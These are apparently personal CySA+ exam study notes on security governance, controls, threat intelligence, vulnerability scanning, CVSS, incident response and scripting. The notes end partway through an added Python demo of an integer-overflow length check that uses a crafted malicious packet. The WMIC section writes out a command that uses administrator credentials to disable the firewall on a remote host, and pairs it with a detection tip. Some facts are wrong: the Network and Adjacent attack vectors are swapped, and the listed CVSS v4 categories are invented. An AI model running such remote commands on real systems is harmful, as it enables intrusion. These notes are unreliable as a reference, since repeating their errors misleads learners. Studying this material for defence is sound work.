Sec+ Expires August 17, 2025

# My personal prep for CySA+ exam

Not complete, just notes to develop my understanding in prep.

### 1a Understanding CS leadership concepts

#### SANS policy

https://www.sans.org/information-security-policy/

#### Service Level Objective (SLO)

SLOs are measurable standards organizations set to ensure the security of their network and assets.

- **Purpose:**
  - Assess how well security operations protect the organization.
  - Provide assurance to customers and stakeholders about system and data security.
- **Characteristics:**
  - Must be realistic and achievable.
  - Often reflect the latest security trends and best practices.
- **Common Security-Related SLOs:**
  - **Mean Time to Detect (MTTD):** How quickly threats are identified.
  - **Mean Time to Recover (MTTR):** How quickly systems recover after an incident.
  - **Time to Patch:** Duration between patch release and application.
- **Role of Policies and Compliance:**
  - Compliance teams rely on policy documents and SLOs to measure performance and adherence.
  - Actionable tasks are derived from policies to ensure work is compliant.
- **Risk Management & Governance Interaction:**
  - Risk managers identify new risks and expect governance teams to update policies accordingly.
  - Policy documents provide the foundation for managing and enforcing security rules.
- **Example Process Flow:**
  1. Compliance reviews patch management and reports "time to patch."
  2. Risk managers identify increasing delays in patching over months.
  3. Risk managers find change requests for patch delays approved by department leaders.
  4. The governance team responds by requiring two management approvals for patch delays.
  5. Governance updates the change management policy to enforce this new rule.
#### NIST 4 T's - Risk management

Avoid (terminate), Accept (tolerate), Mitigate (treatment), Transfer (transfer). Risks need follow-up for any follow-on risks.

#### Threat modelling

Identifying threat actors and their TTPs.

MITRE ATT&CK

Microsoft threat modelling tool

![[Microsoft threat modelling tool 1.png]]

Two-pronged attack via social engineering: usually backing up a prompt with a follow-up for extra effectiveness. Show a forged badge, or use urgency in a voice message or email, and follow up with a phone call. Example: an email requesting 250k, then a deepfake phone call to encourage authorising the payment.

Threat modelling requires:

- knowledge of system components
- knowledge of attack methods
- knowledge of appropriate mitigations
- knowledge of laws and regulations
- knowledge of business impacts

**Collaboration required**

----------

### 1b Control types and methods

#### Control classes:

- technical (logical controls) - system (hardware, software, firmware), e.g. firewall, AV
- operational (people controls) - primarily people, e.g. security guards, training programs
- managerial (oversight) - give oversight of systems, e.g. Nessus, risk register

#### Function:

- preventive - eliminate or reduce the likelihood; acts before an attack takes place, e.g. ACL on a firewall, anti-malware
- detective - record and identify any attempted intrusion, e.g. logs, centralised logs, SIEM, IDS
- corrective - used after an attack, or to reduce the impact of an attack, e.g. patching the exploited vulnerabilities, backup software
- compensating - using a different methodology or technology due to a limitation, e.g. increasing monitoring if you can't implement MFA
- responsive - incident response control; allows you to identify, detect, and respond, e.g. SIEM, honeypot
SOC

---

SUMMARY:

- **Preventive:** Stop attacks before they happen
- **Detective:** Identify attacks or suspicious activities
- **Responsive:** Actions taken _after_ detection to limit damage
- **Corrective:** Fix or remediate issues caused by attacks
- **Compensating:** Alternative controls when primary controls can't be used

Patch management is a preventive control, as it involves regularly updating systems to prevent exploitation of vulnerabilities. However, the application of specific patches in response to identified vulnerabilities is a corrective control, as it remedies an existing security weakness.

External resources:

- [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf) - Security & Privacy Controls for Information Systems and Organisations
- [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171r3.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171r3.pdf) - Protecting Controlled Unclassified Information in Non-federal Systems and Organizations
- [https://www.isms.online/information-security/everything-you-need-to-know-about-the-iso-27001-2022-standard-update/](https://www.isms.online/information-security/everything-you-need-to-know-about-the-iso-27001-2022-standard-update/) - ISO 27001 Standards
- [https://www.cisecurity.org/controls](https://www.cisecurity.org/controls) - CIS Controls

#### Managing Attack Surface

STIGs - Security Technical Implementation Guides - https://public.cyber.mil/stigs/

CIS benchmarks

##### Footprinting

Footprinting aims to get a more holistic view of a system or network, whereas fingerprinting is more targeted to a specific application or operating system.

Methods of footprinting: footprinting is the technique used for gathering information about computer systems and the entities they belong to. To get this information, a hacker might use various tools and technologies.
This information is very useful to a hacker who is trying to crack a whole system.

https://web-check.as93.net/

https://whoxy.com

##### Passive recon

Bug bounty reports: https://nored0x.github.io/penetration%20testing/writeups-Bug-Bounty-hackrone/

### 1c Patch management

#### Configuration management tools:

- Chef
- Puppet
- Ansible
- Terraform

### 2a Threat actor concepts

- nation-state
- organised crime
- hacktivist
- insider threat
- script kiddie
- supply chain access

### 2b Identify active threats

Indicators of attack (IoAs), and the confidence levels provided by threat information data, are used to identify threats, understand exploits, and reveal an attacker's activities.

UEBA - User and Entity Behaviour Analytics

Information Sharing and Analysis Centers (ISACs)

#### Honeypots

[https://blueclouddrive.com/generate](https://blueclouddrive.com/generate) Generate your Canarytoken here

[https://canarytokens.org/generate](https://canarytokens.org/generate) Canarytokens is a free tool that helps you discover you've been breached by having attackers announce themselves. The tokens allow you to implant traps.
[https://www.smokescreen.io/](https://www.smokescreen.io/) Deception technology to blanket your network with decoys to catch the serious bad attackers

[https://www.stationx.net/canarytokens/](https://www.stationx.net/canarytokens/)

[https://whiteclouddrive.com/generate](https://whiteclouddrive.com/generate)

[https://d3fend.mitre.org/](https://d3fend.mitre.org/)

#### Exploit databases

https://www.exploit-db.com/

#### Threat Feeds

- Cybersecurity and Infrastructure Security Agency: https://www.cisa.gov/cybersecurity
- NIST Computer Security Resource Center: https://csrc.nist.gov/
- FBI InfraGard: https://www.infragard.org/
- SANS Internet Storm Center: https://isc.sans.edu/
- VirusTotal Intelligence: https://www.virustotal.com/gui/intelligence-overview
- Cisco Talos Intelligence: https://www.talosintelligence.com/
- Spamhaus: https://www.spamhaus.org/
- CrowdStrike: https://www.crowdstrike.com/products/threat-intelligence/
- AlienVault Open Threat Exchange: https://otx.alienvault.com/
- Anomali: https://www.anomali.com/products/threatstream
- Mandiant: https://www.mandiant.com/advantage/threat-intelligence
- Abuse.ch: https://abuse.ch/

### 2c Exploring threat hunting concepts

- misconfig hunting - search for misconfigured systems, services, and applications that can be exploited
- isolated network hunting - air-gapped networks; exploiting vulnerabilities in a connected system
- business-critical asset hunting - vulns and threats that could impact critical infrastructure and severely degrade business operations

Use uncoder.io to turn Sigma rules into detections.

Decoy methods/active defence: honeypots

### 3a Reviewing system and network architecture concepts

| Subkey Name | Description |
| --- | --- |
| SAM | Security Accounts Manager (SAM) stores username information for accounts used on the current computer |
| SECURITY | Linked to the security database of the domain the current user is logged onto |
| SOFTWARE | Contains settings for software and the Windows operating system |
| SYSTEM | Contains settings for drivers and file systems |
| DEFAULT | Contains settings for the LocalSystem account profile |

#### Virtualisation:

- type 1 - ESXi
- type 2 - VirtualBox
- application virtualisation - ThinApp
- containerisation - includes all necessary components; kernel shared

#### SD-WAN

Network functions:

- control plane - makes decisions about how traffic should be prioritised and secured and where it should be switched; routing tables. "Where should the traffic go?"
- data plane - handles the actual switching and routing of traffic and the imposition of ACLs/firewall rules, based on the control plane. "Move this packet here."
- management plane - monitoring traffic and status; configuration

Using the management plane you can configure the control plane, which in turn impacts how the data plane handles packets.

#### Zero trust

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207.pdf

Always verify and authorise. The network edge has become more blurred, therefore ZTA has become more crucial.

The foundation of SASE: ZTA is the security model that drives the SASE framework.

##### Deperimeterisation

The cause for ZTA and SASE. Drivers:

- cloud
- remote work
- mobile devices
- outsourced contractors
- wi-fi

#### SASE

Secure Access Service Edge - framework built on access through resources, users, services, and workflows rather than through network boundaries.

SWG, SD-WAN, FWaaS, ZTA

Cloud native

#### ZTA and SASE

ZTA is the rulebook for the development of SASE, which is a cloud service framework.

### 3b Exploring identity and access management

Federation - trust another company to manage their accounts and access our resources. OpenID, SAML.

Transitive trust - if A trusts resource B and resource B trusts resource C, then A trusts C.

CASB - enable SSO, enforce RBAC, scan for malware, monitor and audit user/device activity.

### 3c Data loss prevention

Remediation is the action the DLP software takes when it detects a policy violation.
The following remediation mechanisms are typical:

- Alert only—The copying is allowed, but the management system records an incident and may alert an administrator.
- Block—The user is prevented from copying the original file but retains access to it. The user may or may not be alerted to the policy violation, but it will be logged as an incident by the management engine.
- Quarantine—Access to the original file is denied to the user (or possibly any user). This might be accomplished by encrypting the file in place or by moving it to a quarantine area in the file system.
- Tombstone—The original file is quarantined and replaced with one describing the policy violation and how the user can release it again.

#### Public Key Infrastructure

Public key infrastructure (PKI) provides a suite of tools designed to support public/private key management, integrity checks via digital signatures, and authentication, as well as non-repudiation of users and/or devices through the use of private key encryption. PKI offers the opportunity to centralize digital certificate standards and the methods used to provide cryptographic services. This is important as it helps improve compliance with established policy and/or regulatory requirements relative to cryptography.

PKI provides the mechanisms required to confidently identify the owners of public keys. PKI issues digital certificates guaranteed by a trusted certificate authority (CA). Trusted CAs are preestablished by recording their information within operating system certificate stores, within browsers, and by using special hardware storage components. Digital certificates are foundational to HTTPS traffic.

#### Secure Sockets Layer (SSL) Inspection

Secure sockets layer (SSL) inspection is the process of inspecting encrypted HTTPS traffic. Without SSL inspection, network administrators cannot monitor encrypted traffic for threats, making HTTPS traffic an easy method for attackers to avoid detection.
SSL inspection is also essential for verifying that website certificates are valid, helping protect against on-path (man-in-the-middle) attacks, where an attacker intercepts communications between two parties, and for detecting traffic encrypted with anything other than a trusted third-party certificate. SSL inspection also helps enforce organizational policies, ensuring that employees comply with acceptable use policies and do not attempt to access restricted content or share/upload restricted data.

SSL inspection is often accomplished by installing digital certificates on end devices that allow encrypted traffic to be intercepted, decrypted, and inspected by security tools or software before being re-encrypted and forwarded to the intended destination. Web proxies, load balancers, next-gen firewalls, and similar devices all support this capability.

#### Log ingestion

- DEBUG: used for debugging purposes
- INFO: used for informative messages
- WARNING: used to indicate a potential problem
- ERROR: used to indicate a serious problem
- CRITICAL: used to indicate a critical problem

### 4a Process improvement in security operations

- SIEM and SOAR
- Playbooks and runbooks
- MISP: https://www.misp-project.org/
- Single pane of glass
- Webhooks and APIs
- Plugins and apps

### 5a Compliance requirements

ISO / NIST, legal contracts

PCI DSS AoC - Attestation of Compliance: a document that demonstrates an org's compliance, produced by a QSA (Qualified Security Assessor) or the merchant.

#### CMMI - Capability Maturity Model Integration

Capability Maturity Model Integration (CMMI) describes five levels of maturity within the operational or software capabilities of an organization. Measuring software capabilities is the most common use, and this assessment is frequently required by many federal contracts. A CMMI assessment is very focused on identifying that all work is defined through well-established processes. The results of the assessment will establish the maturity level, or score, of an organization.
The scores include the following:

- Level 1: Initial—Processes do not exist, and work is reactive in nature.
- Level 2: Managed—Many work activities are defined via processes, but work is still frequently reactive in nature.
- Level 3: Defined—The majority of work is well defined via processes, and proactive measures are in place.
- Level 4: Quantitatively Managed—All work is well defined via processes, proactive measures are in place, and the work outputs are tracked and analyzed.
- Level 5: Optimizing—Work is well defined via processes

Cloud Security Alliance STAR - assessment

#### OWASP

- [https://owasp.org/www-project-webgoat/](https://owasp.org/www-project-webgoat/)
- [https://owasp.org/www-project-juice-shop/](https://owasp.org/www-project-juice-shop/)
- TryHackMe room, OWASP Top 10: [https://tryhackme.com/room/owasptop10](https://tryhackme.com/room/owasptop10)
- TryHackMe room, OWASP Juice Shop: [https://tryhackme.com/room/owaspjuiceshop](https://tryhackme.com/room/owaspjuiceshop)
- [https://owasp.org/www-community/Vulnerability_Scanning_Tools](https://owasp.org/www-community/Vulnerability_Scanning_Tools)
- [https://owasp.org/www-project-web-security-testing-guide/](https://owasp.org/www-project-web-security-testing-guide/)
- [https://owasp.org/www-project-proactive-controls/](https://owasp.org/www-project-proactive-controls/)
- [https://github.com/OWASP/wstg/tree/master/document](https://github.com/OWASP/wstg/tree/master/document) - OWASP Testing Guide, very extensive
- [https://owasp.org/www-project-web-security-testing-guide/](https://owasp.org/www-project-web-security-testing-guide/)

#### GDPR latest changes

Preparing for 2025: Key Compliance Areas for Businesses - UK GDPR: UK and EU compliance 2025

1. Legitimate Interest Assessments (LIAs)
   - Integral to data processing under UK and EU GDPR.
   - Conduct LIAs reflecting nuanced differences post-Brexit.
   - Key components of an LIA:
     - Clearly outline the legitimate interest.
     - Demonstrate necessity of data processing.
     - Prove data subject's rights do not override these interests.
   - Regularly review LIAs to align with regulatory updates.
2. Data Transfer Impact Assessments (DTIAs)
   - Essential for cross-border data transfers post-Brexit.
   - Evaluate protections for personal data transferred outside the UK/EU.
   - Consider frameworks like the Data Privacy Framework for UK-US transfers.
   - Stay prepared for potential legal status changes.
3. Data Protection by Design and Default
   - Integrate data privacy measures into all business processes.
   - Conduct regular Data Privacy Impact Assessments (DPIAs) for high-risk activities.
   - Ensure only necessary data is processed and access is limited.
   - Align activities with GDPR principles.
4. Maintaining Records of Processing Activities (RoPAs)
   - Mandatory for significant or high-risk data processing.
   - Provide a clear picture of the data lifecycle.
   - Regularly update RoPAs to reflect evolving guidelines.

### 5b Understanding vuln scanning methods

Internal vs external: inside vs outside.

##### Vuln scan features:

###### credentialed/noncredentialed

- credentialed: gives greater insight into vulnerabilities on devices; offers the most comprehensive evaluation
- noncredentialed: low impact on the device, and gives insight into the vulnerabilities an attacker might be able to scope. Additionally much simpler to implement

###### agent/agentless

- agent: allows collection of data via the endpoint to then be assessed for vulns. Less restricted by firewalls and reduces load on the scanner.
  Also introduces an attack vector and an application to patch.
- agentless: uses protocols such as WMI, SNMP, and SSH, which might be restricted by firewalls, but is the simplest to implement

###### active/passive

- active: interact with the device or software to identify vulns, e.g. banner grabbing, content enumeration, web app scanner (Nessus, OpenVAS, Nexpose, Qualys)
- passive: without direct interaction with the device or software, for example network pcap - insecure protocols, cleartext credentials, inadequate encryption (Zeek, Tenable PVS)

###### Criticality ranking

Custom scoring for prioritisation of remediation efforts. Custom rankings: VPR (Tenable), CVSS.

###### Mapping and enum

Most scanners will do host discovery.

##### Analysis methods

- map/discovery - identifies devices connected to the network; identify rogue devices
- device fingerprinting - identifies specific details about devices; focused on an individual device for a better understanding of its purpose, vendor, software versions - vulns
- static analysis - manual inspection of source code to identify vulns. Also reviewing network diagrams and config files
- dynamic analysis - vuln scan software, pen testing, evaluating via manual tasks (Burp Suite); fuzzing is unknown-environment testing - inject malformed data
- reverse engineering - deconstructing code/hardware to determine how it was crafted.
  Threat actors reverse engineer patches to discover undisclosed vulnerabilities.
- compliance scan and regulatory requirements

##### Hardening

- disablement of unneeded interfaces: Bluetooth, management, wifi, ethernet
- disablement of unneeded services - like remote access
- disablement of unneeded ports
- self-encrypting drives
- disablement of unneeded accounts

CIS provides benchmarks for hardening devices. The DoD SCAP tool runs STIG benchmarks.

##### Config baselines

CIS critical security controls

DoD STIG: cat 1 immediate, cat 2 possible, cat 3 degrade controls (confidentiality, availability, and integrity)

### 5c Exploring special considerations in vuln scanning

Segmentation: a server-based scanner needs to be able to communicate across subnets; agentless scanning needs to be able to send reports back to the server. IDS/IPS might block scans or generate alerts.

###### Performance considerations:

- ID OS for vuln scans - typically done automatically
- Scanning interval (regularly, to ID new vulns)
- Scan speed
- Vuln database - if the quality of the database is low then what's the point
- Type of scan: port, vuln, config
- Authentication - more comprehensive but can use more resources
- FP - important to report and manage false positives

##### Data sensitivity levels

A data inventory or data map: where data is stored and its sensitivity. A clear view of data for enabling protections.

##### Operational technology (OT)

OT describes the technology. ICS is a focused OT system; the rest are functional components.

| Component | Role | Relation |
| --- | --- | --- |
| **PLC (Programmable Logic Controller)** | The **core controller** for individual devices/machinery. Takes input from sensors and issues output to actuators. | Hardware-level control |
| **SCADA (Supervisory Control and Data Acquisition)** | Provides **centralized, remote monitoring** and control across multiple PLCs/devices. | System-level supervision |
| **HMI (Human-Machine Interface)** | The **user interface** for interacting with PLCs or SCADA systems locally. | Operator interface |
| **Data Historian** | **Database/logging** system that stores all historical operational data. | Analysis, auditing, compliance |

Example (water treatment plant):

| Component | Role |
| --- | --- |
| **Operational Technology (OT)** | Describes the class of technology, similar to how IT is information technology. |
| **ICS** | Controls different stages of water purification: sedimentation, chlorination, distribution. |
| **PLC** | Controls a pump: reads pressure sensor → starts/stops pump → opens valve. |
| **SCADA** | In the control room, visualizes all plant data from 10+ PLCs. Sends commands remotely. |
| **HMI** | Operator panel next to the pump. Staff sees water pressure & can press "start" or "stop". |
| **Data Historian** | Stores all pressure readings, valve states, and alarms for the last 2 years. |

### 6a Understanding Vulnerability Scoring Concepts

SCAP, CVSS, vuln validation, context

#### SCAP languages

Security Content Automation Protocol, defined by STIG: https://public.cyber.mil/stigs/scap/ - standardises the identification of flaws in software, misconfigurations, and vulns.

- OVAL - Open Vulnerability and Assessment Language - consistent interpretation of vulns - [https://oval.mitre.org/](https://oval.mitre.org/)
- ARF - Asset Reporting Format - info about assets
- XCCDF - Extensible Configuration Checklist Description Format - benchmarks - https://csrc.nist.gov/files/pubs/ir/7275/r4/upd1/final/docs/nistir-7275r4_updated-march-2012_clean.pdf

#### SCAP ID schemes

- CPE - Common Platform Enumeration - URI-like ID for software and hardware
- CVE - Common Vulnerabilities and Exposures
- CCE - configuration

#### CVSS scoring

> [!NOTE] 4 approx. questions on exam for CVSS
> Calculate CVSS score

##### CVSS v2, v3, v4

https://www.first.org/cvss/

Score from 0 - 10:

- 0: None
- 0.1+: Low
- 4.0+: Medium
- 7.0+: High
- 9.0+: Critical

###### CVSS Metrics v3.1

Attack Vector (AV) - Physical (P), Local (L), Adjacent network (A), or Network (N)

The physical attack vector includes physical access to the system, such as accessing the device in person. The local attack vector consists of the ability to manipulate the system with local access, such as by using a USB-connected device. The network attack vector includes two distinct categories: adjacent network and network. Network (N) describes access via the same broadcast domain, whereas Adjacent network (A) refers to connectivity from any location. Network attacks include access to a system via the network, and include actions such as sending malicious data packets or instructions. The attack vectors help organizations identify the best way to implement protections.

Attack Complexity (AC) - High (H) or Low (L)

Refers to the difficulty of the attack techniques used by a threat actor. Low indicates a straightforward attack, and high indicates a more complicated attack.
Attack complexity is important to consider when evaluating the risk posed by a vulnerability. If the attack complexity is high, it may be difficult or impossible for a threat actor to exploit the vulnerability, thus reducing the risk. On the other hand, if the attack complexity is low, the risk posed by the vulnerability is greater.

Privileges Required (PR) - None (N), Low (L), or High (H)

This represents permissions such as guest or anonymous (N), standard user (L), and administrator (H).

User Interaction (UI) - None (N) or Required (R)

Whether an exploit of the vulnerability depends on some local user action, such as executing a file attachment.

Scope (S) - Unchanged (U) or Changed (C)

This indicates whether the exploit affects only the local security context (U) or not (C). For example, a hypervisor vulnerability might allow an exploit from one VM to other VMs.

Confidentiality (C), Integrity (I), and Availability (A) - High (H), Low (L), or None (N)

Where the metrics above assess exploitability, these three separate metrics measure impacts to the CIA triad.

### 6b Exploring vuln context considerations

Validate: TP, FP, TN, FN

CVSSv4 Categories: #prep-important

- Impact — The potential damage or harm caused by the vulnerability.
- Exploitability — The ease and likelihood of exploiting a vulnerability.
- Remediation — The cost and effort required to fix the vulnerability.

Metrics:

- Scope — The number of systems and people affected by the vulnerability.
- Confidentiality — The extent to which data is disclosed.
- Integrity — The extent to which the system's functionality is changed or impaired.
- Availability — The extent to which a system is unavailable.
- Privacy — The extent to which the system's privacy is impacted.
- Operations — The extent to which the system's security is affected.
- Other — Any other relevant or important factors.
### 7a Effective communication concepts

#### Vuln management reporting

Makes the org aware of risks to the IT infrastructure: simple summaries of existing vulnerabilities, detailed remediation steps.

#### Regulatory compliance reports

Prepared by qualified personnel and often include information on policies and procedures.

#### Internal compliance reports

Include assessments of endpoints to validate configuration against required baselines.

#### KPI

Incidents, detection times, indicators of compromise, threats, risk assessment, resource allocations.

Cons: incidents are subjective, FPs, inaccurate CS landscape data, irrelevant data; KPI-based decision-making is complicated.

#### SLO

Customer-oriented operations - provide a benchmark by which security operations can measure their performance.

### 7b Vuln reporting outcomes and action plans

- establish policies
- training
- compensating controls

#### MoU

A Memorandum of Understanding is a legal document that outlines the terms and conditions of an agreement between two or more parties. It is an agreement that is not legally binding but serves as a document of understanding and good faith among the parties involved. A memorandum of understanding usually outlines the agreement's objectives and each party's duties and responsibilities.

#### SLA

Legally binding contract between parties.

### 8a Understand incident response activities

Plan, guidelines, resources, protocols, minimise impact.

Phases: prep, detection/analysis, contain, eradicate/recovery, post-incident

- policies - set out the org's expectations and procedures for responding to security incidents
- procedures - the org's actions during incident response
- assessment of potential impacts - risk analyses and impact measures; scope of identified incidents

Playbooks: https://www.gov.scot/publications/cyber-resilience-incident-management/

Communication Plan - A secure method of communication between the IR team members is essential for successfully managing incidents.
The team may require "out-of-band" or "off-band" channels that attackers cannot intercept. In a major intrusion incident, using corporate email or VoIP runs the risk that the adversary can intercept communications. One obvious method is via smartphones, but ideally the messaging system should support end-to-end encryption, digital signatures, and encryption keys supplied by a system independent of the identity and access management systems used by the attacked environment.

#### Tabletop exercise resources

- https://www.ncsc.gov.uk/section/exercise-in-a-box/overview
- [https://www.thecyberfish.com/](https://www.thecyberfish.com/)
- [https://circadence.com/](https://circadence.com/)
- https://irgame.ai/

#### Post incident

Lessons learned report (LLR) or after-action report (AAR).

#### BCDR

Business Continuity and Disaster Recovery: BC keeps the business running; DR is part of BC and covers the immediate recovery efforts.

### 8b Perform incident response activities

#### Forensics

- chain of custody
- identification
- collection
- analysis
- reporting/presentation

Legal hold - keep data pending a legal case.

eDiscovery - email, logs, text, voicemail discovered via legal hold.

Immediate impact - fines, cost of assets.

### 9a Understanding incident response comms

Stakeholder: a person, group, or org that can affect or be affected by a particular incident.

Incidents impact stakeholders, and their areas of responsibility may be shaped by their knowledge of the incident. Keeping stakeholders informed helps them manage their responsibilities (affected by the incident) and often reveals information the responders may not have previously known, such as alternative processes, business relationships, impacts, and consequences.
### 9b Analysing incident response activities

Autopsy - analyse a forensic image: [Autopsy - Digital Forensics](https://www.autopsy.com/)

### 10a Identifying malicious activity

pcap samples

Domains: https://www.whoxy.com/

### 10b Attack methodology frameworks

Security testing: https://www.isecom.org/OSSTMM.3.pdf

Kill chain: weaponisation, delivery, exploitation, installation, C2, actions

Diamond model - analyse an intrusion event

![[Diamond Model.png]]

```
E = { {Adversary, C_adversary},
      {Capability, C_capability},
      {Infrastructure, C_infrastructure},
      {Victim, C_victim} = { {IP, C_ip},
                             {Port, C_port},
                             {Process, C_process} },
      {Timestamp, C_timestamp},
      { ... } }
```

![[Diamond model explained.png]]

![[Diamond model mapping.png]]

#### Maltego

Visualisation alternative: https://github.com/HuronOsint/OsintDistro

### 12a Analysing web vulns

- Burp Suite
- OWASP ZAP (Zed Attack Proxy) - [https://www.zaproxy.org/docs/guides/zapping-the-top-10-2021/](https://www.zaproxy.org/docs/guides/zapping-the-top-10-2021/)
- Nikto - web scanner - https://www.cirt.net/Nikto2
- Arachni - web scanner (new name: SCNR) - [GitHub - Arachni/arachni: Web Application Security Scanner Framework](https://github.com/Arachni/arachni?tab=readme-ov-file), [Ecsypno Single Member P.C. – R&D and Consulting](https://ecsypno.com/)
- Immunity Debugger - analysis / reverse engineering of software
- GNU Debugger - analysis / reverse engineering of software

### 12b Analyse cloud vulns

- ScoutSuite - audit tool - github.com/nccgroup/ScoutSuite
- Prowler - audit tool - github.com/toniblyx/prowler
- Pacu - exploit framework - github.com/RhinoSecurityLabs/pacu
- rhinosecuritylabs.com/aws/cloudgoat-vulnerable-design-awsenvironment

### 13a Understanding scripting languages

- ksh - unix, ibm
- sh - Bourne shell
- csh - C shell - unix, oracle
- tcsh - improved C shell
- bash - Bourne again shell, improved sh
- zsh - Z shell, expands on the bash shell

##### Common:

- cat - Display the content of a file.
- tail - Display the last 10 lines of a file.
- head - Display the first 10 lines of a file.
- touch - Create an empty file.
- mkdir - Create a directory.
- cp - Copy a file (or directory).
- mv - Move an object, such as a file. Also used to rename files and directories.
- rm - Remove a file or directory.
- file - Determine the type of a file.
- ls - Display the contents of a directory.
- locate - Search for files. Locate uses a database to improve the speed and efficiency of searches.
- find - Search for files by parsing the file system.
- wget - Simple command to retrieve content from an HTTP server.
- curl - Similar to wget but includes more sophisticated options.

###### Admin:

- vi/vim - A file editor for use in a terminal. Very popular but nonintuitive to use.
- su - Substitute or switch user.
- sudo - Precedes a command that requires elevated privileges.
- useradd - Create a user account.
- usermod - Change the attributes of a user account.
- chmod - Change the read, write, execute attributes of a file or directory.
- chown - Change permissions on a file or directory.
- mkfifo - Similar in concept t

###### Arithmetic:

- `+` Addition
- `-` Subtraction
- `*` Multiplication
- `/` Division
- `%` Modulus

##### Operators:

- `==` Is equal to
- `!=` Is not equal to
- `-eq` Alternative form of "is equal to"
- `-ne` Alternative form of "is not equal to"
- `-gt` Greater than
- `-lt` Less than
- `-ge` Greater than or equal to
- `-le` Less than or equal to

#### PowerShell

#### WMIC

Windows Management Instrumentation Command-Line (WMIC) is a powerful command line tool for performing administrative tasks and is well suited to scripting and automation. WMIC is part of the Windows Management Instrumentation (WMI) framework. It allows administrators to query, configure, and manage various system components, such as the operating system, hardware, and services. It also provides access to hardware and software information and can be used to manage and deploy applications remotely.

The power and versatility of WMIC also makes it a valuable tool for attackers. One popular capability of WMIC is `process call create`, which allows an authenticated user to start a command on a remote host.
This example uses WMIC to issue a command on the remote host 10.0.2.6 to disable the Windows Firewall:
`wmic /node:10.0.2.6 /user:Administrator /password:CySAisC00L! process call create "cmd.exe /c netsh advfirewall set allprofiles state off"`
Detection check: on the target, a process created this way has the WMI provider host (`WmiPrvSE.exe`) as its parent; on the source, look for `wmic.exe` command lines containing `/node:` and `process call create`.
#### Python
#### RegEx
#### JSON
#### XML

### 13b id malicious activity through analysis
- **Unusual network traffic** - This can include unexpected spikes in network activity, communication with unfamiliar IP addresses, or unusual data flow patterns, which may indicate data exfiltration or command and control (C2) activity.
- **Unexpected files or processes** - This can include the appearance of unknown files or processes on a system, which may indicate malware or an attacker with access to a system.
- **Unexpected communication** - This can include unexpected communication between applications and systems, which may indicate attempts to exploit vulnerabilities, establish a C2 channel, or exfiltrate data.
- **Communication with suspicious IP addresses** - This can include communication with IP addresses that are known to be associated with malware, phishing campaigns, or other cyberattacks.
- **Unusual communication protocols** - This can include communication protocols not typically used in the environment, which may indicate attempts to bypass security measures or establish a C2 channel.
- **Large data transfers** - This can include the transfer of large amounts of data to external IP addresses, which may indicate data exfiltration or the theft of sensitive data.
- **Communication during unusual times** - This can include communication during unusual hours or outside of normal business hours, which may indicate attempts to evade detection.
- **Communication with suspicious domains** - This can include contact with domains that are known to be associated with phishing campaigns, cyberattacks, or domains that have been recently registered.
- **Encrypted communication** - This can include encrypted or obfuscated communication, which may indicate attempts to hide malicious activity from security personnel.

### 14a exploring secure software dev practices
SSDLC
NIST Secure Software Development Framework - https://csrc.nist.gov/Projects/ssdf
Synopsys Secure SDLC 101 - https://www.synopsys.com/blogs/software-security/secure-sdlc/
Microsoft SDL Practices - https://www.microsoft.com/en-us/securityengineering/sdl/
Palo Alto: What Is Secure Software Development Lifecycle (Secure SDLC)? - https://www.paloaltonetworks.com/cyberpedia/what-is-secure-software-development-lifecycle
OWASP testing guide https://owasp.org/www-project-web-security-testing-guide/
Auth attacks: on-path, password spraying, credential stuffing

### 14b recommending controls to mitigate successful app attacks
The heap is an area of memory the application allocates at run time for dynamically sized data. The heap can hold larger amounts of data than the stack, and heap objects are reachable from anywhere in the process. A heap overflow can overwrite those objects (and the allocator's own metadata) and possibly allow arbitrary code execution. An example is a known vulnerability in Microsoft's GDI+ processing of JPEG images https://kb.cert.org/vuls/id/297462. Management of objects in the heap is the responsibility of the code that allocated them; failing to de-allocate memory causes a memory leak.

An integer overflow is a software vulnerability that occurs when a program tries to store an integer value larger than the maximum the data type can hold, causing the value to wrap around to a lower (or negative) value. The overflow itself does not write outside the variable, but if the wrapped value feeds a length check, loop bound or allocation size, the program typically ends up with an undersized buffer and a subsequent buffer overflow, or passes a security check it should have failed.
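To make the wrap-around concrete, here is an added example that is not part of the course notes: Python integers never overflow, so 32-bit C arithmetic is emulated with a mask. The packet layout (a 4-byte little-endian length field plus 4 bytes of flags), `BUF_SIZE` and the function names are hypothetical; the vulnerable and fixed length checks are the real pattern.

```python
"""Integer overflow in a length check, emulated in Python (added example).

Emulates the C idiom  `if (payload_len + HEADER_LEN <= BUF_SIZE) memcpy(...)`
where payload_len is an attacker-controlled uint32. Packet format is hypothetical.
"""
import struct

U32_MAX = 0xFFFFFFFF
BUF_SIZE = 1024        # destination buffer size (hypothetical)
HEADER_LEN = 8         # fixed header: uint32 payload_len + uint32 flags


def u32(value: int) -> int:
    """Emulate unsigned 32-bit C arithmetic: wrap on overflow."""
    return value & U32_MAX


def vulnerable_check(payload_len: int) -> bool:
    """Bug: the sum is computed in 32 bits first, so it can wrap to a small number."""
    total = u32(payload_len + HEADER_LEN)
    return total <= BUF_SIZE


def safe_check(payload_len: int) -> bool:
    """Fix: compare without an addition that can wrap.

    BUF_SIZE - HEADER_LEN is a compile-time constant that cannot overflow, so
    the comparison is sound for every value the uint32 field can hold.
    """
    if payload_len > U32_MAX:
        return False       # wider than the field; only reachable from Python callers
    return payload_len <= BUF_SIZE - HEADER_LEN


def parse_header(packet: bytes) -> int:
    """Read the little-endian uint32 payload_len field from the header."""
    if len(packet) < HEADER_LEN:
        raise ValueError("short packet")
    payload_len, _flags = struct.unpack_from("<II", packet, 0)
    return payload_len


# Constructed samples. The malicious one sets payload_len = 0xFFFFFFFC so that
# payload_len + 8 wraps to 4 in 32-bit arithmetic and passes the `<= BUF_SIZE` test,
# after which the C code would copy ~4 GiB into a 1 KiB buffer.
BENIGN = struct.pack("<II", 16, 0) + b"B" * 16
MALICIOUS = struct.pack("<II", 0xFFFFFFFC, 0) + b"A" * 16


def demo() -> dict:
    """Run both checks over both packets and return the outcomes."""
    results = {}
    for name, pkt in (("benign", BENIGN), ("malicious", MALICIOUS)):
        n = parse_header(pkt)
        results[name] = {
            "payload_len": n,
            "wrapped_total": u32(n + HEADER_LEN),
            "vulnerable_accepts": vulnerable_check(n),
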